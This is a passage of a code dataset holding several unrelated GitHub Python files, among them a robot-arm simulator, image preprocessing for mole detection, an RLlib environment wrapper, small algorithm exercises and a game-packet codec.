assigned\n                if 1 <= int(getchr) <= len(search):\n                    i = int(getchr) - 1\n                    score = search[i][\"score\"]\n                    total = search[i][\"score\"][\"total\"]\n                    score.pop(\"total\")\n                    os.system(\"clear\")\n                    print(\"Name: \"+search[i][\"name\"] + \"\\nYear: \" + search[i][\"year\"] + \"\\nCountry: \" + search[i][\"country\"] + \"\\nScore: \" + total)\n                    for key in score:\n                        print(\"    \" + key + \": \" + score[key])\n                    getch.getch()\n                    main()\n            except:\n                pass\n            main(\"2\", \"s\")\n        elif option == \"c\":\n            s = \"\"\n            ch = \"\"\n            os.system(\"clear\")\n            print(\"Country Code: \", end=\"\", flush=True)\n            while ch != '\\n':\n                ch = getch.getch()\n                if ch == \"\\x7f\":\n                    s = s[:-1]\n                if ch.isalpha():\n                    s += ch\n                os.system('clear')\n                print(\"Country Code: \" + s, end=\"\", flush=True)\n            search = [result for result in results['intl'] if s == result[\"country\"]]\n            os.system('clear')\n            
print(str(len(search)) + \" people took this USACO contest from \" + s + \":\\n\")\n            for result in search:\n                print(\"(\" + str(search.index(result) + 1) + \") \" + result[\"name\"] + \"(\" + result[\"year\"] + \") from \" + result[\"country\"])\n            try:\n                getchr = \"\"\n                while \"\\n\" not in getchr:\n                    ch = str(getch.getch())\n                    if ch == \"q\":\n                        getchr = \"\"\n                        break\n                    getchr += ch  # append the key that was just read (a second keypress was being consumed here)\n                getchr = getchr.replace(\"\\n\", \"\")  # assign the result; str.replace does not modify in place\n                if 1 <= int(getchr) <= len(search):\n                    i = int(getchr) - 1\n                    score = search[i][\"score\"]\n                    total = search[i][\"score\"][\"total\"]\n                    score.pop(\"total\")\n                    os.system(\"clear\")\n                    print(\"Name: \"+search[i][\"name\"] + \"\\nYear: \" + search[i][\"year\"] + \"\\nCountry: \" + search[i][\"country\"] + \"\\nScore: \" + total)\n                    for key in score:\n                        print(\"    \" + key + \": \" + score[key])\n                    getch.getch()\n                    main()\n            except:\n                pass\n            main(\"2\", \"c\")\n\nif __name__ == \"__main__\":\n    main()","repo_name":"PiAreSquared/USACO","sub_path":"December2019/B/Results/parseResults.py","file_name":"parseResults.py","file_ext":"py","file_size_in_byte":8826,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} {"seq_id":"7430730387","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\n\n\nclass Torque2LinksArmRobot:\n\n\n    def __init__(self, l1:float, l2:float, lc1:float, lc2:float, m1:float, m2:float, theta_init:np.ndarray, theta_dot_init:np.ndarray, timestep:float=0.0167, color:str='black') -> None:\n        # Retrieve the constructor arguments\n        self.l1 = l1\n        self.l2 = l2\n        self.lc1 = lc1\n        self.lc2 = lc2\n        self.m1 = m1\n        self.m2 = m2\n        self.dt = timestep\n        self.color = color\n        self.max_length = l1 + l2\n        self.g = 9.80665\n        self.b1 = 0.09\n        self.b2 = 0.07\n\n        # Trajectory to follow\n        self.KP_VAL = 0.0\n        self.KI_VAL = 0.0\n        self.KD_VAL = 0.0\n        self.traj_exists = False\n        self.traj_startpoint = (0, 0)\n        self.traj_endpoint = (0, 0)\n        self.last_x_e = np.array([\n            [0.0],\n            [0.0]\n        ])\n        self.int_x_e = np.array([\n            [0.0],\n            [0.0]\n        ])\n\n        # Calculate the approximate inertial moment I1 and I2 based on lc1 and lc2\n        self.I1 = (0.667)*(m1*lc1*l1)\n        self.I2 = (0.667)*(m2*lc2*l2)\n\n        # Time and state variables\n        self.iter = 0\n        self.theta = [theta_init]\n        self.theta_dot = [theta_dot_init]\n        self.theta_ddot = []\n        self.tau = []\n\n        # Calculate constant values inside matrices\n        # M matrix\n        self.M11_const_a = m1*lc1**2 + m2*(l1**2 + lc2**2) + self.I1 + self.I2\n        self.M11_const_b = 2.0*m2*l1*lc2\n        self.M12_const_a = m2*lc2**2 + self.I2\n        self.M12_const_b = m2*l1*lc2\n        self.M21_const_a = self.M12_const_a\n        self.M21_const_b = self.M12_const_b\n        self.M22_const_a = m2*lc2**2 + self.I2\n        self.M = lambda theta: np.array([\n            [self.M11_const_a + self.M11_const_b*np.cos(theta[1].item()), self.M12_const_a + self.M12_const_b*np.cos(theta[1].item())],\n            [self.M21_const_a + self.M21_const_b*np.cos(theta[1].item()), self.M22_const_a]\n        ])\n\n        # C matrix\n        self.C_const = m2*l1*lc2\n        self.C = lambda theta, theta_dot: np.array([\n            [-2.0*self.C_const*np.sin(theta[1].item())*theta_dot[1].item(), -self.C_const*np.sin(theta[1].item())*theta_dot[1].item()],\n            [self.C_const*np.sin(theta[1].item())*theta_dot[0].item(), 0]\n        ])\n\n        # b matrix\n        self.b = np.array([\n            [self.b1, 0],\n            [0, self.b2]\n        ])\n\n        # G matrix\n        self.G_const_a = m1*self.g*lc1 + m2*self.g*l1\n        self.G_const_b = m2*self.g*lc2\n        self.G = lambda theta: np.array([\n            [self.G_const_a*np.cos(theta[0].item()) + self.G_const_b*np.cos(theta[0].item() + theta[1].item())],\n            
[self.G_const_b*np.cos(theta[0].item() + theta[1].item())]\n        ])\n\n        # Jacobian\n        self.J = lambda theta : np.array([\n            [-self.l1*np.sin(theta[0].item()) - self.l2*np.sin(theta[0].item()+theta[1].item()), -self.l2*np.sin(theta[0].item() + theta[1].item())],\n            [self.l1*np.cos(theta[0].item()) + self.l2*np.cos(theta[0].item()+theta[1].item()), self.l2*np.cos(theta[0].item() + theta[1].item())]\n        ])\n\n        # Forward kinematics\n        self.fk_x1 = lambda theta: np.array([\n            [self.l1*np.cos(theta[0].item())], \n            [self.l1*np.sin(theta[0].item())]\n        ])\n        self.fk_x2 = lambda theta: self.fk_x1(theta) + np.array([\n            [self.l2*np.cos(theta[0].item() + theta[1].item())], \n            [self.l2*np.sin(theta[0].item() + theta[1].item())]\n        ])\n\n\n\n    def setTrajectoryPoints(self, start_point:tuple, end_point:tuple, time:float) -> None:\n        self.traj_exists = True\n        self.traj_startpoint = start_point\n        self.traj_endpoint = end_point\n        self.traj_time = time\n\n\n\n    def calcControlLaw(self) -> np.ndarray:\n        if self.traj_exists:\n            time = self.iter*self.dt\n\n            # Trajectory\n            s = (time/self.traj_time)**3.0\n            s2 = 3.0*(time**2.0)/(self.traj_time**3.0)\n            s3 = 6.0*(time)/(self.traj_time**3.0)\n            if s >= 1.0: s = 1.0\n\n            x_d = np.array([\n                [self.traj_startpoint[0]*(1.0 - s) + self.traj_endpoint[0]*s],\n                [self.traj_startpoint[1]*(1.0 - s) + self.traj_endpoint[1]*s]\n            ])\n            x_dot_d = np.array([\n                [(self.traj_endpoint[0] - self.traj_startpoint[0])*s2],\n                [(self.traj_endpoint[1] - self.traj_startpoint[1])*s2]\n            ])\n            x_ddot_d = np.array([\n                [(self.traj_endpoint[0] - self.traj_startpoint[0])*s3],\n                [(self.traj_endpoint[1] - self.traj_startpoint[1])*s3]\n            ])\n\n            # Calculate errors; the integral term uses the trapezoidal rule, (e_prev + e)*dt/2\n            x_e = x_d - self.fk_x2(self.theta[self.iter])\n            self.int_x_e += (self.last_x_e + x_e)*(self.dt/2.0)\n            self.last_x_e = x_e\n            theta_dot_e = np.linalg.inv(self.J(self.theta[self.iter]))@x_dot_d - self.theta_dot[self.iter]\n\n            # Compute F\n            F = x_ddot_d + self.KP_VAL*x_e + self.KI_VAL*(self.int_x_e)\n\n            # Calculate the input\n            return self.M(self.theta[self.iter])@(np.transpose(self.J(self.theta[self.iter]))@F + self.KD_VAL*theta_dot_e) + self.C(self.theta[self.iter], self.theta_dot[self.iter])@self.theta_dot[self.iter] + self.G(self.theta[self.iter])\n\n        else:\n            return np.array([\n                [0.0],\n                [0.0]\n            ])\n\n\n\n    def torqueInput(self, torques:np.ndarray) -> None:\n        self.tau.append(torques)\n\n\n\n    def stepSimulation(self) -> None:\n        # Calculate theta_ddot\n        theta = self.theta[self.iter]\n        theta_dot = self.theta_dot[self.iter]\n        tau = self.tau[self.iter]\n        theta_ddot = np.linalg.inv(self.M(theta))@(tau - (self.C(theta, theta_dot) + self.b)@theta_dot - self.G(theta))\n        self.theta_ddot.append(theta_ddot)\n\n        # Compute theta and theta_dot\n        new_theta_dot = theta_dot + theta_ddot*self.dt\n        new_theta = theta + new_theta_dot*self.dt\n        self.theta_dot.append(new_theta_dot)\n        self.theta.append(new_theta)\n\n        # Add iteration\n        self.iter += 1\n\n\n\n    def render(self) -> None:\n        # Prepare the plot\n        self.render_step = 0\n        self.fig, self.ax = plt.subplots(1, 1)\n\n        # Reshape the theta\n        self.theta_1 = [theta[0].item() for theta in self.theta]\n        self.theta_2 = [theta[1].item() for theta in self.theta]\n\n        # Calculate the point of each joint\n        self.joint1_x = [self.l1*np.cos(theta_1) for theta_1 in self.theta_1]\n        self.joint1_y = [self.l1*np.sin(theta_1) for theta_1 in self.theta_1]\n        self.joint2_x = []\n        self.joint2_y = []\n        for i in range(self.iter):\n            self.joint2_x.append(self.joint1_x[i] + self.l2*np.cos(self.theta_1[i] + self.theta_2[i]))\n            self.joint2_y.append(self.joint1_y[i] + 
self.l2*np.sin(self.theta_1[i] + self.theta_2[i]))\n\n\n\n def stepPlay(self) -> None:\n if self.render_step < self.iter:\n # Clear the axis\n self.ax.clear()\n\n # Define the joints\n plt.title('2-Links Arm Dynamics Simulation')\n self.ax.set_xlim(-self.max_length, self.max_length, auto=False)\n self.ax.set_ylim(-self.max_length, self.max_length, auto=False)\n self.ax.set_xlabel('x-axis')\n self.ax.set_ylabel('y-axis')\n self.ax.set_aspect('equal')\n self.ax.plot([0.0, self.joint1_x[self.render_step]], [0.0, self.joint1_y[self.render_step]], lw=6, c=self.color)\n self.ax.scatter([0.0, self.joint1_x[self.render_step]], [0.0, self.joint1_y[self.render_step]], s=200, c=self.color)\n self.ax.plot([self.joint1_x[self.render_step], self.joint2_x[self.render_step]], [self.joint1_y[self.render_step], self.joint2_y[self.render_step]], lw=6, c=self.color)\n self.ax.scatter([self.joint1_x[self.render_step], self.joint2_x[self.render_step]], [self.joint1_y[self.render_step], self.joint2_y[self.render_step]], s=200, c=self.color)\n\n if self.traj_exists:\n self.ax.plot([self.traj_startpoint[0], self.traj_endpoint[0]], [self.traj_startpoint[1], self.traj_endpoint[1]], lw=3, c='b')\n\n # Increment the render step\n self.render_step += 1\n\n\n\nclass Velocity2LinksArmRobot:\n\n\n def __init__(self, l1:float, l2:float, theta_init:np.ndarray, timestep:float=0.0167, color:str='black') -> None:\n # Retrieve the constructor arguments\n self.l1 = l1\n self.l2 = l2\n self.theta = [theta_init]\n self.theta_dot = []\n self.dt = timestep\n self.color = color\n self.max_length = l1 + l2\n\n # Iteration\n self.iter = 0\n\n # Initial conditions\n self.fk_x1 = lambda theta: np.array([[-self.l1*np.sin(theta[0].item())], [self.l1*np.cos(theta[0].item())]])\n self.fk_x2 = lambda theta: self.fk_x1(theta) + np.array([[-self.l2*np.sin(theta[0].item() + theta[1].item())], [self.l2*np.cos(theta[0].item() + theta[1].item())]])\n self.x1 = [self.fk_x1(self.theta[0])]\n self.x2 = [self.fk_x2(self.theta[0])]\n\n # Jacobian\n self.J = lambda theta : np.array([\n [-self.l1*np.cos(theta[0].item())-self.l2*np.cos(theta[0].item()+theta[1].item()), -self.l2*np.cos(theta[0].item() + theta[1].item())],\n [-self.l1*np.sin(theta[0].item())-self.l2*np.sin(theta[0].item()+theta[1].item()), -self.l2*np.sin(theta[0].item() + theta[1].item())]\n ])\n\n\n\n def velocityInput(self, theta_dot:np.ndarray) -> None:\n self.theta_dot.append(theta_dot)\n\n\n\n def stepSimulation(self) -> None:\n # Calculate the next theta\n self.theta.append(self.theta[self.iter] + self.theta_dot[self.iter]*self.dt)\n\n # Add iteration\n self.iter += 1\n\n # Compute next task space\n self.x1.append(self.fk_x1(self.theta[self.iter]))\n self.x2.append(self.fk_x2(self.theta[self.iter]))\n\n\n\n def render(self) -> None:\n # Prepare the plot\n self.render_step = 0\n self.fig, self.ax = plt.subplots(1, 1)\n\n # Reshape the theta\n self.theta_1 = [theta[0].item() for theta in self.theta]\n self.theta_2 = [theta[1].item() for theta in self.theta]\n\n # Reshape the task spaces\n self.joint1_x = [x1[0].item() for x1 in self.x1]\n self.joint1_y = [x1[1].item() for x1 in self.x1]\n self.joint2_x = [x2[0].item() for x2 in self.x2]\n self.joint2_y = [x2[1].item() for x2 in self.x2]\n\n\n\n def stepPlay(self) -> None:\n if self.render_step < self.iter:\n # Clear the axis\n self.ax.clear()\n\n # Define the joints\n plt.title('2-Links Arm Kinematics Simulation')\n self.ax.set_xlim(-self.max_length, self.max_length, auto=False)\n self.ax.set_ylim(-self.max_length, self.max_length, 
auto=False)\n            self.ax.set_xlabel('x-axis')\n            self.ax.set_ylabel('y-axis')\n            self.ax.set_aspect('equal')\n            self.ax.plot([0.0, self.joint1_x[self.render_step]], [0.0, self.joint1_y[self.render_step]], lw=6, c=self.color)\n            self.ax.scatter([0.0, self.joint1_x[self.render_step]], [0.0, self.joint1_y[self.render_step]], s=200, c=self.color)\n            self.ax.plot([self.joint1_x[self.render_step], self.joint2_x[self.render_step]], [self.joint1_y[self.render_step], self.joint2_y[self.render_step]], lw=6, c=self.color)\n            self.ax.scatter([self.joint1_x[self.render_step], self.joint2_x[self.render_step]], [self.joint1_y[self.render_step], self.joint2_y[self.render_step]], s=200, c=self.color)\n\n            # Increment the render step\n            self.render_step += 1","repo_name":"dhonanhibatullah/python_modules","sub_path":"twolinksarmrobot_sim.py","file_name":"twolinksarmrobot_sim.py","file_ext":"py","file_size_in_byte":12162,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} {"seq_id":"13220436380","text":"import pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os\nimport cv2\nfrom PIL import Image\nimport tensorflow\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator, img_to_array, array_to_img, load_img\nfrom tensorflow.keras.preprocessing import image_dataset_from_directory\n\ndata = pd.read_csv('E:\BeCodeProjects\Mole_Detection_Project\Dataset\data\CLIN_DIA.csv', encoding='latin')\ndata = data.dropna().reset_index(drop=True)  # reset the index so the positional lookups below stay valid after rows are dropped\ndata['kat.Diagnose'] = data['kat.Diagnose'].replace([0, 1], 0).replace([2, 3], 1)\n# print(data)\n\nimages = os.listdir('E:/BeCodeProjects/Mole_Detection_Project/Dataset/data/skin_cancer/Datadef')\n# creating list\nbenign = []\nmalignant = []\n\nimg_ids = []\nfor image in images:\n    img_id = image  # .lower()#.split#('.')#.lower()\n    img_ids.append(img_id)\n\n# separating images based on danger(1.0) or no-danger(0.0) states\nfor i in range(len(images)):\n    if data['kat.Diagnose'][i] == 0.0:\n        benign.append(img_ids[i])\n    elif data['kat.Diagnose'][i] == 1.0:\n        malignant.append(img_ids[i])\n\nfor benign_data in benign:\n    f = Image.open('E:/BeCodeProjects/Mole_Detection_Project/Dataset/data/skin_cancer/Datadef/' + benign_data)\n    #f.save('E:/BeCodeProjects/Mole_Detection_Project/Dataset/data/skin_cancer/training_set/benign/' + benign_data)\n\n# saves malignant images from original folder to newly created folder for malignant category\nfor malignant_data in malignant:\n    f = Image.open('E:/BeCodeProjects/Mole_Detection_Project/Dataset/data/skin_cancer/Datadef/' + malignant_data)\n    #f.save('E:/BeCodeProjects/Mole_Detection_Project/Dataset/data/skin_cancer/training_set/malignant/' + malignant_data)\n\n# Data augmentation on training data and validation data\nbatch_size = 32\ntrain_datagen = ImageDataGenerator(rescale=1. / 255.0,\n                                   shear_range=0.2,\n                                   zoom_range=0.2,\n                                   width_shift_range=0.1,\n                                   height_shift_range=0.1,\n                                   horizontal_flip=True,\n                                   validation_split=0.2)\n\nvalid_datagen = ImageDataGenerator(rescale=1. / 255.0,\n                                   shear_range=0.2,\n                                   zoom_range=0.2,\n                                   width_shift_range=0.1,\n                                   height_shift_range=0.1,\n                                   horizontal_flip=True,\n                                   validation_split=0.2)\ntest_datagen = ImageDataGenerator(rescale=1. 
/ 255.0)\ntraining_generator = train_datagen.flow_from_directory(r'E:/BeCodeProjects/Mole_Detection_Project/Dataset/data/skin_cancer/training_set',\n target_size=(128, 128), # resize image,\n batch_size=32,\n save_to_dir=r'E:/BeCodeProjects/Mole_Detection_Project/Dataset/data/skin_cancer/resized',\n save_format='bmp',\n shuffle=True,\n seed=42,\n subset='training',\n class_mode='binary')\nvalid_generator = valid_datagen.flow_from_directory(directory=r'E:/BeCodeProjects/Mole_Detection_Project/Dataset/data/skin_cancer/training_set',\n target_size=(128, 128),\n subset='validation',\n batch_size=32,\n class_mode=\"binary\",\n shuffle=True,\n seed=42)\n\"\"\"\ntest_generator=test_datagen.flow_from_directory(directory=r'E:/BeCodeProjects/Mole_Detection_Project/Dataset/data/skin_cancer/test',\n target_size=(128, 128),\n\n batch_size=32,\n class_mode=\"binary\",\n shuffle=True,\n seed=42)\n\"\"\"\n","repo_name":"manasanoolu7/Mole_Detection_Project","sub_path":"preprocess/preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":4415,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36212546951","text":"def get_prime_table(n):\n sieve = [False, False] + [True] * (n - 1)\n m = int(n ** 0.5)\n for i in range(2, m + 1):\n if sieve[i]:\n for j in range(i + i, n + 1, i):\n sieve[j] = False\n return sieve\n\n\nif __name__ == '__main__':\n inputs = []\n while True:\n num = int(input())\n if num == 0:\n break\n inputs.append(num)\n prime_table = get_prime_table(max(inputs) * 2)\n for i_num in inputs:\n count = 0\n for num in range(i_num + 1, i_num * 2 + 1):\n if prime_table[num]:\n count += 1\n print(count)\n","repo_name":"kjb4494/baekjoon","sub_path":"python3/09.기본 수학 2/4948.py","file_name":"4948.py","file_ext":"py","file_size_in_byte":619,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24439546593","text":"from typing import Any, Callable, Dict, Optional, Sequence, Tuple, Union, cast\nfrom typing_extensions import TypedDict\nfrom gym import spaces\nimport numpy as np\n\nfrom ray.rllib.env import MultiAgentEnv\nfrom ray.rllib.env.multi_agent_env import make_multi_agent\nfrom ray.rllib.utils.typing import AgentID\nfrom ray.tune.registry import _global_registry, ENV_CREATOR, register_env\n\n\nclass LatentWrapperConfig(TypedDict):\n env: str\n \"\"\"Name of the environment to wrap.\"\"\"\n\n env_config: dict\n \"\"\"Configuration to be passed to the wrapped environment.\"\"\"\n\n latent_dist: Callable[[], np.ndarray]\n \"\"\"Thunk to use to draw random variables.\"\"\"\n\n episodes_per_latent: int\n \"\"\"Number of episodes that should be played for each latent vector sampled.\"\"\"\n\n agents_with_latent: Sequence[AgentID]\n \"\"\"The set of agent IDs for which latent vectors should be appended.\"\"\"\n\n random_policy_dist: Optional[Callable[[int], np.ndarray]]\n \"\"\"If this is not None, then also append the action probabilities at the current\n state of a random policy. This function should take a seed and return a random\n draw which is deterministic given the seed.\"\"\"\n\n use_tuple: bool\n \"\"\"Add latents as the second element of an obervation tuple instead of concatenating\n it to the observation tensor.\"\"\"\n\n\nObsWithLatent = Union[np.ndarray, Tuple[np.ndarray, np.ndarray]]\n\n\nclass LatentEnvWrapper(MultiAgentEnv):\n \"\"\"\n Environment wrapper that appends a latent vector to the observations for each\n episode. 
It will maintain the same latent vector for a certain number of episodes\n before switching to a new one.\n \"\"\"\n\n base_env: MultiAgentEnv\n config: LatentWrapperConfig\n\n current_latent: np.ndarray\n current_latent_id: int\n episodes_with_current_latent: int\n\n def __init__(self, config: LatentWrapperConfig):\n base_env_name = config[\"env\"]\n base_env_config = config[\"env_config\"]\n env_creator = _global_registry.get(ENV_CREATOR, base_env_name)\n base_env = env_creator(base_env_config)\n if isinstance(base_env, MultiAgentEnv):\n self.base_env = base_env\n else:\n env_creator = make_multi_agent(env_creator)\n self.base_env = env_creator(base_env_config)\n\n self.config = config\n self.config.setdefault(\"random_policy_dist\", None)\n self.config.setdefault(\"use_tuple\", False)\n\n if hasattr(self.base_env, \"observation_space\"):\n total_latent_size = self.config[\"latent_dist\"]().shape[0]\n if self.config[\"random_policy_dist\"] is not None:\n total_latent_size += self.config[\"random_policy_dist\"](0).shape[0]\n if self.config[\"use_tuple\"]:\n base_obs_space: spaces.Space = cast(\n Any, self.base_env\n ).observation_space\n latent_bound = np.inf * np.ones(total_latent_size)\n latent_space = spaces.Box(low=-latent_bound, high=latent_bound)\n self.observation_space = spaces.Tuple((base_obs_space, latent_space))\n else:\n base_obs_space_box: spaces.Box = cast(\n Any, self.base_env\n ).observation_space\n latent_bound = np.ones(\n base_obs_space_box.shape[:-1] + (total_latent_size,)\n )\n self.observation_space = spaces.Box(\n low=np.concatenate(\n [base_obs_space_box.low, latent_bound * -np.inf], axis=-1\n ),\n high=np.concatenate(\n [base_obs_space_box.high, latent_bound * np.inf], axis=-1\n ),\n )\n\n self.action_space = self.base_env.action_space\n\n self._sample_latent()\n\n def __getattr__(self, name: str) -> Any:\n # Pass through any attribute accesses to the base env.\n return getattr(self.base_env, name)\n\n def _sample_latent(self) -> None:\n self.current_latent = self.config[\"latent_dist\"]()\n self.current_latent_id = hash(np.random.random())\n self.episodes_with_current_latent = 0\n\n def reset(self):\n if self.episodes_with_current_latent >= self.config[\"episodes_per_latent\"]:\n self._sample_latent()\n self.episodes_with_current_latent += 1\n\n base_obs = self.base_env.reset()\n return self._append_latent_to_obs_dict(base_obs)\n\n def step(self, action_dict):\n base_obs, base_reward, base_done, base_infos = self.base_env.step(action_dict)\n\n return (\n self._append_latent_to_obs_dict(base_obs),\n base_reward,\n base_done,\n base_infos,\n )\n\n def _append_latent_to_obs_dict(\n self,\n obs_dict: Dict[AgentID, np.ndarray],\n ) -> Dict[AgentID, ObsWithLatent]:\n obs_dict_with_latent: Dict[AgentID, ObsWithLatent] = {}\n for agent_id, obs in obs_dict.items():\n if agent_id in self.config[\"agents_with_latent\"]:\n obs_dict_with_latent[agent_id] = self._append_latent_to_obs(obs)\n else:\n obs_dict_with_latent[agent_id] = obs\n return obs_dict_with_latent\n\n def _append_latent_to_obs(self, obs: np.ndarray) -> ObsWithLatent:\n latent_to_append = self.current_latent\n\n if self.config[\"random_policy_dist\"] is not None:\n obs_hash = hash(obs.data.tobytes())\n random_policy_action_probs = self.config[\"random_policy_dist\"](\n obs_hash + self.current_latent_id\n )\n latent_to_append = np.concatenate(\n [latent_to_append, random_policy_action_probs]\n )\n\n if self.config[\"use_tuple\"]:\n return (obs, latent_to_append)\n else:\n latent_to_append = latent_to_append[\n 
(np.newaxis,) * (obs.ndim - self.current_latent.ndim) + (slice(None),)\n            ]\n            latent_to_append = np.broadcast_to(\n                latent_to_append,\n                obs.shape[:-1] + (latent_to_append.shape[-1],),\n            )\n            return cast(np.ndarray, np.concatenate([obs, latent_to_append], axis=-1))\n\n\nregister_env(\"latent_wrapper\", lambda config: LatentEnvWrapper(config))\n","repo_name":"cassidylaidlaw/boltzmann-policy-distribution","sub_path":"bpd/envs/latent_wrapper.py","file_name":"latent_wrapper.py","file_ext":"py","file_size_in_byte":6279,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"} {"seq_id":"70092348587","text":"class Solution:\n    def findGCD(self, nums: List[int]) -> int:\n        nums.sort()\n        smallNum = nums[0]\n        bigNum = nums[-1]\n        # integer modulo avoids the float-precision pitfalls of the original `/ i % 1 == 0` test\n        i = smallNum\n        while i >= 1:\n            if bigNum % i == 0 and smallNum % i == 0:\n                return i\n            i = i - 1\n        return 1","repo_name":"BaseBenjamin13/leetcode","sub_path":"1979-find-greatest-common-divisor-of-array/1979-find-greatest-common-divisor-of-array.py","file_name":"1979-find-greatest-common-divisor-of-array.py","file_ext":"py","file_size_in_byte":316,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} {"seq_id":"33383204854","text":"import logging\n\nfrom modis import main\nfrom . import api_rocketleaguestats, ui_embed\n\nlogger = logging.getLogger(__name__)\n\nALIAS_STEAM = [\"steam\", \"pc\"]\nALIAS_PS = [\"ps\", \"psn\", \"playstation\", \"ps4\", \"playstation4\"]\nALIAS_XBOX = [\"xbox\", \"xb\", \"xb1\", \"xbone\", \"xboxone\", \"xbox1\"]\n\n\nasync def on_command(root, aux, query, msgobj):\n    if root == \"rlstats\":\n        await msgobj.channel.trigger_typing()\n\n        if not aux:\n            platform = \"steam\"\n        elif aux[0] in ALIAS_STEAM:\n            platform = \"steam\"\n        elif aux[0] in ALIAS_PS:\n            platform = \"ps\"\n        elif aux[0] in ALIAS_XBOX:\n            platform = \"xbox\"\n        else:\n            platform = \"steam\"\n\n        # Get Rocket League stats from stats API\n        success, rldata = api_rocketleaguestats.check_rank(query, platform)\n\n        # Create embed UI\n        if success:\n            embed = ui_embed.success(msgobj.channel, rldata[0], rldata[1], rldata[2], rldata[3])\n        else:\n            embed = ui_embed.fail_api(msgobj.channel)\n\n        await embed.send()\n","repo_name":"ModisWorks/rocketleague","sub_path":"on_command.py","file_name":"on_command.py","file_ext":"py","file_size_in_byte":1059,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} {"seq_id":"27410794315","text":"import sqlite3\r\n\r\nconn = sqlite3.connect('db/user_status.db')\r\ncursor = conn.cursor()\r\n\r\ncursor.execute(\"\"\"\r\n    CREATE TABLE IF NOT EXISTS users \r\n    (user_id TEXT, isvote INT)\r\n    \"\"\")\r\n\r\nusrid = \"502121096271757333\"\r\n\r\nrow = cursor.execute(f\"SELECT isvote FROM users WHERE user_id={usrid}\").fetchone()\r\nif row and row[0] == 0:  # check the column value directly instead of substring-matching the tuple's str()\r\n\tprint(123)\r\n\r\nconn.commit()","repo_name":"Wisper0098/DiscordBot","sub_path":"db_config.py","file_name":"db_config.py","file_ext":"py","file_size_in_byte":354,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} {"seq_id":"37448841198","text":"from typing import Optional, Union\nfrom .packlib import *\nfrom _key import xorKey\nimport itertools\nimport struct\nimport binascii\ndef flatten(l):\n    out = []\n    for item in l:\n        if type(item) == list:\n            out.extend(flatten(item))\n        else:\n            out.append(item)\n    return out\n\nclass CSNSocket:\n    def __init__(self):\n        self.send_packet_length = 0\n        self.send_seqnum = 0\n        self.send_opcode = 0\n        
self.send_hash = 0\n self.send_payload = None\n\n self.recv_packet_length = 0\n self.recv_seqnum = 0\n self.recv_opcode = 0\n self.recv_hash = 0\n self.recv_payload: Union[bytes, list] = b''\n self.recv_decrypt_payload: bytes = b''\n\n def build(self, payload):\n p = b\"\"\n \n if payload == None or len(payload) == 0:\n return p\n elif type(payload) == bytes:\n self.inject_payload(payload)\n p += p32(self.send_packet_length)\n p += p32(self.send_hash) # hash\n p += self.send_payload\n \n elif type(payload) == list:\n payload = flatten(payload)\n for i in range(len(payload)):\n if payload[i] == None or len(payload[i]) == 0:\n continue\n if type(payload[i]) == bytes:\n self.inject_payload(payload[i])\n p += p32(self.send_packet_length)\n p += p32(self.send_hash)\n p += self.send_payload\n return p\n \n\n def inject_payload(self, payload):\n self.send_seqnum = (self.send_seqnum + 1) & 0xFF\n self.send_payload = payload\n self.send_packet_length = (\n ((len(payload) + 8) & 0x3FFF) | self.send_seqnum << 12)\n return payload\n\n def printheader(self):\n try:\n print(f\"[*] length: {self.recv_packet_length}\\topcode: {self.recv_opcode}\\thash: {self.recv_hash}\\tseqnum: {self.recv_seqnum}\\txorkey: {(xorKey[4 * ((self.recv_seqnum +0xF) & 0xFF)])}\")\n except:\n pass\n return\n\n def printdata(self):\n print(f\"[*] Raw packet: {binascii.hexlify(self.recv_payload)}\")\n print(f\"[*] Dec packet: {binascii.hexlify(self.recv_decrypt_payload)}\")\n return\n\n def encrypt(self):\n # Actually, we don't need encrypt data to send client.\n # Just for legacy and documentation.\n self.send_hash = xorKey[self.send_opcode]\n for idx, byte in enumerate(self.send_payload):\n self.send_hash += byte & 0x5F\n # encpayload = chr((byte ^ xorKey[self.opcode + 0xF]) & 0xFF)\n self.send_hash += xorKey[self.send_opcode + 0x25] + self.send_opcode\n\n def decrypt(self, payload):\n # 0~0x08 Bytes is header\n self.recv_payload = payload\n self.recv_packet_length = self.recv_payload[0]\n # ex : 1B 58 01 ..\n # lg ==1B\n # sq ==== 5\n # op ======\n self.recv_seqnum = (up32u(self.recv_payload[0:4]) >> 12) & 0xFF\n self.recv_hash = up32u(self.recv_payload[4:8])\n self.recv_decrypt_payload = self.recv_payload[8:]\n\n # For decrypt payload faster, I use array.\n dec = []\n for i in range(0, len(self.recv_decrypt_payload)):\n dec.append(self.recv_decrypt_payload[i] ^ (\n xorKey[4 * ((self.recv_seqnum + 0xF) & 0xFF)]))\n\n self.recv_decrypt_payload = bytes(dec)\n self.recv_opcode = self.recv_decrypt_payload[0]\n","repo_name":"mirusu400/PySlayer","sub_path":"lib/csnsocket.py","file_name":"csnsocket.py","file_ext":"py","file_size_in_byte":3484,"program_lang":"python","lang":"en","doc_type":"code","stars":36,"dataset":"github-code","pt":"37"} +{"seq_id":"4633751845","text":"from functools import partial\nfrom datetime import datetime\nimport os\nimport argparse\nimport math\n\nimport swconfig as swc\n\n# Using collections for testing\nfrom collections import namedtuple\n# Switch to using dataclasses if you have support for python 3.7.x\n# from dataclasses import dataclass\n\nBADWARNING = '\\033[43;30m'\nOKGREEN = '\\033[42m'\nFAIL = '\\033[41m'\nENDC = '\\033[0m'\nWHITE = '\\033[97m'\nBLACK_TEXT = '\\033[30m'\nTEST_PASSED = OKGREEN + WHITE + \"Test Passed!\" + ENDC + ENDC\nTEST_FAILED = FAIL + WHITE + \"Test Failed!\" + ENDC + ENDC\nTEST_DIVIDER = '-'*28\n\n# Class to build scripts and commands\n\nclass Builder:\n\n # Value Checking Fns\n\n # 